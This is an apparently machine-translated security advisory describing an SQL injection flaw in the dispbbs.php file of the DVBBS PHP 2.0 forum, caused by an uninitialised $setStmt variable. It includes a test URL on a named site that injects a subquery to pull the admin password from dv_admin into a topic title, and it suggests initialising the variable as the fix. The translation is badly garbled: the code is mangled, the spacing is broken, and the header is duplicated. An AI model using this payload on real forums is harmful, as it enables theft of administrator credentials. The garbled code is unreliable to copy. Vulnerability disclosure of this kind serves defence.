Affected System: dynamic network forum Dvbbsphp2.0 ++ Description: DVBBS is an open source ASPWeb Forum program developed and maintained by Aspsky. Net. In the dispbbs. php file of DVBBS: if ($ board_settings [55]! 0 $ TopicInfo [locktopic] 0 dateDiff (d, $ TopicInfo [dateandtime], TIME_NOW)
Affected Systems:
Mobile NetworkBbs'Target = '_ blank'>ForumDvbbsPhp2.0 +
Description:
DVBBS is an open source ASP Web forum program developed and maintained by Aspsky. Net.
In the dispbbs. php file of DVBBS:
If ($ board _SetCounter [55]! = 0 & $ TopicInfo ['locktopic '] = 0 &&DateDiff ('D', $ TopicInfo ['dateandTime'], TIME_NOW)> $ board_settings [55]) {// 85th rows
$ TopicInfo ['locktopic '] = 1;
$ SetStmt = ', locktopic = 1 ';
}
$ Db-> query ("UPDATE {$ dv} topic SET hits = (case when hits is null then 1 ELSE hits + 1 END) {$ setStmt} WHERE topicId= {$ AnnouNcEID }");
When the if statement is not true, $ setStmt is not assigned a value and $ setStmt is not initialized, resulting in an SQL injection vulnerability.
<* Source: SEBUG
Test method:
Http://www.xiaoweio.cn/dispbbs.php? Boardid = 2 & id = 1 & page = 1 & setStmt =, title = (select % 20 password % 20 from % 20dv_admin)
Suggestion:
Temporary solution:
* Initialization variable $ setStmt
Vendor patch:
Mobile Network Forum
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.dvbbs.net/